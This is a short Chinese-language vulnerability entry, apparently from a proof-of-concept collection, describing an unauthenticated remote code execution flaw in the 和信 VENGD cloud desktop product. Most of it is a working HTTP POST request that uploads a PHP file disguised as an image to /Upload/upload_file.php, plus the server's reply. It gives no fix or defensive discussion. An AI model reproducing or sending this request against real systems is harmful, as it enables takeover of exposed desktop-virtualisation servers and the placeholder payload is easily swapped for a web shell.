和信下一代云桌面系统(VENGD),是国内的基于NGD(Next Generation Desktop)架构的桌面虚拟化产品,它融合了VDI、VOI、IDV三大架构优势,实现了前后端混合计算,在调度服务器后端计算资源的同时更能充分利用前端资源,HVV活动中出现此漏洞。
无
远程
php
无
php
CMS
RCE
2021.04.19
高危
暂无
暂无
POST /Upload/upload_file.php?l=test HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 184
------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="test2.php"
Content-Type: image/avif
<?php phpinfo(); ?>
------WebKitFormBoundaryfcKRltGv--
HTTP/1.1 200 OK
Date: Mon, 26 Apr 2021 15:00:16 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 18
Connection: close
Content-Type: text/html; charset=UTF-8
_Requst:<br>
https://www.seebug.org/vuldb/vulnerabilities?has_poc=true
https://blog.csdn.net/weixin_44146996/article/details/115611026